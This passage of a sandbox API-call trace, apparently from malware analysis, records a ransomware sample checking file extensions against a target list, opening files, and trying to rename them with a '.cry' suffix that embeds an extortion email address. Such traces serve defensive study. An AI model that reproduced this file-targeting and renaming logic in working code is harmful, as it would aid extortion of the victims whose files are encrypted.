(lpString=".ppt") returned 4 [0038.708] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0038.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0038.708] lstrlenW (lpString=".zip") returned 4 [0038.708] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0038.708] lstrlenW (lpString=".rar") returned 4 [0038.708] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0038.708] lstrlenW (lpString=".bz2") returned 4 [0038.708] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0038.708] lstrlenW (lpString=".7z") returned 3 [0038.708] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0038.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0038.708] lstrlenW (lpString=".dbf") returned 4 [0038.708] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0038.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0038.709] lstrlenW (lpString=".1cd") returned 4 [0038.709] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0038.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0038.709] lstrlenW (lpString=".jpg") returned 4 [0038.709] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0038.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0038.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0038.709] lstrlenW (lpString=".doc") returned 4 [0038.709] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0038.709] lstrlenW (lpString=".docx") returned 5 [0038.709] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0038.709] lstrlenW (lpString=".pdf") returned 4 [0038.709] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0038.709] lstrlenW (lpString=".xls") returned 4 [0038.709] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0038.709] lstrlenW (lpString=".xlsx") returned 5 [0038.709] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0038.709] lstrlenW (lpString=".ppt") returned 4 [0038.709] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0038.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0038.709] lstrlenW (lpString=".zip") returned 4 [0038.709] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0038.709] lstrlenW (lpString=".rar") returned 4 [0038.709] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0038.709] lstrlenW (lpString=".bz2") returned 4 [0038.709] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0038.710] lstrlenW (lpString=".7z") returned 3 [0038.710] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0038.710] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0038.710] lstrlenW (lpString=".dbf") returned 4 [0038.710] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0038.710] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0038.710] lstrlenW (lpString=".1cd") returned 4 [0038.710] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0038.710] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0038.710] lstrlenW (lpString=".jpg") returned 4 [0038.710] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0038.710] lstrcmpiW (lpString1=".avi", lpString2=".cry") returned -1 [0038.710] lstrlenW (lpString="join.avi") returned 8 [0038.710] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0038.712] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=222208) returned 1 [0038.712] CloseHandle (hObject=0x1a0) returned 1 [0038.712] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi")) returned 0x20 [0038.712] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0038.712] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0038.712] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0038.712] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0038.713] lstrlenW (lpString=".doc") returned 4 [0038.713] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0038.713] lstrlenW (lpString=".docx") returned 5 [0038.713] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0038.713] lstrlenW (lpString=".pdf") returned 4 [0038.713] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0038.713] lstrlenW (lpString=".xls") returned 4 [0038.713] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0038.713] lstrlenW (lpString=".xlsx") returned 5 [0038.713] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0038.713] lstrlenW (lpString=".ppt") returned 4 [0038.713] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0038.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0038.713] lstrlenW (lpString=".zip") returned 4 [0038.713] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0038.713] lstrlenW (lpString=".rar") returned 4 [0038.713] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0038.713] lstrlenW (lpString=".bz2") returned 4 [0038.713] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0038.713] lstrlenW (lpString=".7z") returned 3 [0038.713] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0038.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0038.713] lstrlenW (lpString=".dbf") returned 4 [0038.713] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0038.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0038.713] lstrlenW (lpString=".1cd") returned 4 [0038.713] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0038.713] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0038.713] lstrlenW (lpString=".jpg") returned 4 [0038.713] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0038.714] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0038.714] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0038.714] lstrlenW (lpString=".doc") returned 4 [0038.714] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0038.714] lstrlenW (lpString=".docx") returned 5 [0038.714] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0038.714] lstrlenW (lpString=".pdf") returned 4 [0038.714] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0038.714] lstrlenW (lpString=".xls") returned 4 [0038.714] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0038.714] lstrlenW (lpString=".xlsx") returned 5 [0038.714] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0038.714] lstrlenW (lpString=".ppt") returned 4 [0038.714] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0038.714] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0038.714] lstrlenW (lpString=".zip") returned 4 [0038.714] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0038.714] lstrlenW (lpString=".rar") returned 4 [0038.714] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0038.714] lstrlenW (lpString=".bz2") returned 4 [0038.714] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0038.714] lstrlenW (lpString=".7z") returned 3 [0038.714] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0038.714] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0038.714] lstrlenW (lpString=".dbf") returned 4 [0038.714] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0038.714] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0038.715] lstrlenW (lpString=".1cd") returned 4 [0038.715] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0038.715] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned 65 [0038.715] lstrlenW (lpString=".jpg") returned 4 [0038.715] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0038.715] lstrcmpiW (lpString1=".avi", lpString2=".cry") returned -1 [0038.715] lstrlenW (lpString="split.avi") returned 9 [0038.715] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0038.715] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=194048) returned 1 [0038.715] CloseHandle (hObject=0x1a0) returned 1 [0038.715] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi")) returned 0x20 [0038.715] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0038.716] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0038.716] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0038.716] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0038.716] lstrlenW (lpString=".doc") returned 4 [0038.716] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0038.716] lstrlenW (lpString=".docx") returned 5 [0038.716] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0038.716] lstrlenW (lpString=".pdf") returned 4 [0038.716] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0038.716] lstrlenW (lpString=".xls") returned 4 [0038.716] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0038.716] lstrlenW (lpString=".xlsx") returned 5 [0038.716] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0038.716] lstrlenW (lpString=".ppt") returned 4 [0038.716] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0038.716] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0038.716] lstrlenW (lpString=".zip") returned 4 [0038.716] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0038.716] lstrlenW (lpString=".rar") returned 4 [0038.716] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0038.716] lstrlenW (lpString=".bz2") returned 4 [0038.716] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0038.716] lstrlenW (lpString=".7z") returned 3 [0038.716] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0038.716] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0038.717] lstrlenW (lpString=".dbf") returned 4 [0038.717] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0038.717] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0038.717] lstrlenW (lpString=".1cd") returned 4 [0038.717] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0038.717] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0038.717] lstrlenW (lpString=".jpg") returned 4 [0038.717] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0038.717] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0038.717] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0038.717] lstrlenW (lpString=".doc") returned 4 [0038.717] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0038.717] lstrlenW (lpString=".docx") returned 5 [0038.717] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0038.717] lstrlenW (lpString=".pdf") returned 4 [0038.717] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0038.717] lstrlenW (lpString=".xls") returned 4 [0038.717] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0038.717] lstrlenW (lpString=".xlsx") returned 5 [0038.717] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0038.717] lstrlenW (lpString=".ppt") returned 4 [0038.717] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0038.717] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0038.717] lstrlenW (lpString=".zip") returned 4 [0038.717] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0038.717] lstrlenW (lpString=".rar") returned 4 [0038.717] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0038.717] lstrlenW (lpString=".bz2") returned 4 [0038.718] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0038.718] lstrlenW (lpString=".7z") returned 3 [0038.718] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0038.718] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0038.718] lstrlenW (lpString=".dbf") returned 4 [0038.718] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0038.718] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0038.718] lstrlenW (lpString=".1cd") returned 4 [0038.718] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0038.718] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 66 [0038.718] lstrlenW (lpString=".jpg") returned 4 [0038.718] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0038.718] lstrcmpiW (lpString1=".avi", lpString2=".cry") returned -1 [0038.718] lstrlenW (lpString="FlickAnimation.avi") returned 18 [0038.718] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0038.719] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=1600388) returned 1 [0038.719] CloseHandle (hObject=0x1a0) returned 1 [0038.719] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi")) returned 0x20 [0038.719] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0038.719] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0 [0038.719] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0038.719] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0038.719] lstrlenW (lpString=".doc") returned 4 [0038.719] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0038.719] lstrlenW (lpString=".docx") returned 5 [0038.719] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0038.719] lstrlenW (lpString=".pdf") returned 4 [0038.719] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0038.719] lstrlenW (lpString=".xls") returned 4 [0038.719] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0038.719] lstrlenW (lpString=".xlsx") returned 5 [0038.719] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0038.719] lstrlenW (lpString=".ppt") returned 4 [0038.720] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0038.720] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0038.720] lstrlenW (lpString=".zip") returned 4 [0038.720] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0038.720] lstrlenW (lpString=".rar") returned 4 [0038.720] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0038.720] lstrlenW (lpString=".bz2") returned 4 [0038.720] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0038.720] lstrlenW (lpString=".7z") returned 3 [0038.720] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0038.720] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0038.720] lstrlenW (lpString=".dbf") returned 4 [0038.720] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0038.720] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0038.720] lstrlenW (lpString=".1cd") returned 4 [0038.720] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0038.720] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0038.720] lstrlenW (lpString=".jpg") returned 4 [0038.720] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0038.720] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0038.720] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0038.720] lstrlenW (lpString=".doc") returned 4 [0038.720] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0038.720] lstrlenW (lpString=".docx") returned 5 [0038.720] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0038.720] lstrlenW (lpString=".pdf") returned 4 [0038.720] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0038.721] lstrlenW (lpString=".xls") returned 4 [0038.721] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0038.721] lstrlenW (lpString=".xlsx") returned 5 [0038.721] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0038.721] lstrlenW (lpString=".ppt") returned 4 [0038.721] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0038.721] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0038.721] lstrlenW (lpString=".zip") returned 4 [0038.721] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0038.721] lstrlenW (lpString=".rar") returned 4 [0038.721] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0038.721] lstrlenW (lpString=".bz2") returned 4 [0038.721] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0038.721] lstrlenW (lpString=".7z") returned 3 [0038.721] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0038.721] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0038.721] lstrlenW (lpString=".dbf") returned 4 [0038.721] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0038.721] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0038.721] lstrlenW (lpString=".1cd") returned 4 [0038.721] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0038.721] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi") returned 69 [0038.721] lstrlenW (lpString=".jpg") returned 4 [0038.721] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0038.722] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0038.722] lstrlenW (lpString="auxbase.xml") returned 11 [0038.722] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0038.729] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=1434) returned 1 [0038.729] CloseHandle (hObject=0x1a0) returned 1 [0038.729] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml")) returned 0x20 [0038.729] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0038.729] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0038.729] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0038.729] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0038.729] lstrlenW (lpString=".doc") returned 4 [0038.729] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0038.729] lstrlenW (lpString=".docx") returned 5 [0038.729] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0038.729] lstrlenW (lpString=".pdf") returned 4 [0038.730] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0038.730] lstrlenW (lpString=".xls") returned 4 [0038.730] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0038.730] lstrlenW (lpString=".xlsx") returned 5 [0038.730] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0038.730] lstrlenW (lpString=".ppt") returned 4 [0038.730] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0038.730] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0038.730] lstrlenW (lpString=".zip") returned 4 [0038.730] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0038.730] lstrlenW (lpString=".rar") returned 4 [0038.730] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0038.730] lstrlenW (lpString=".bz2") returned 4 [0038.730] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0038.730] lstrlenW (lpString=".7z") returned 3 [0038.730] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0038.730] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0038.730] lstrlenW (lpString=".dbf") returned 4 [0038.730] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0038.730] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0038.730] lstrlenW (lpString=".1cd") returned 4 [0038.730] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0038.730] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0038.730] lstrlenW (lpString=".jpg") returned 4 [0038.730] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0038.730] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0038.730] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0038.731] lstrlenW (lpString=".doc") returned 4 [0038.731] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0038.731] lstrlenW (lpString=".docx") returned 5 [0038.731] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0038.731] lstrlenW (lpString=".pdf") returned 4 [0038.731] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0038.731] lstrlenW (lpString=".xls") returned 4 [0038.731] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0038.731] lstrlenW (lpString=".xlsx") returned 5 [0038.731] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0038.731] lstrlenW (lpString=".ppt") returned 4 [0038.731] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0038.731] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 83 [0038.731] lstrlenW (lpString=".zip") returned 4 [0038.731] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0038.731] lstrlenW (lpString=".rar") returned 4 [0038.731] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0038.731] lstrlenW (lpString=".bz2") returned 4 [0038.731] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0038.731] lstrlenW (lpString=".7z") returned 3 [0038.731] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0038.731] 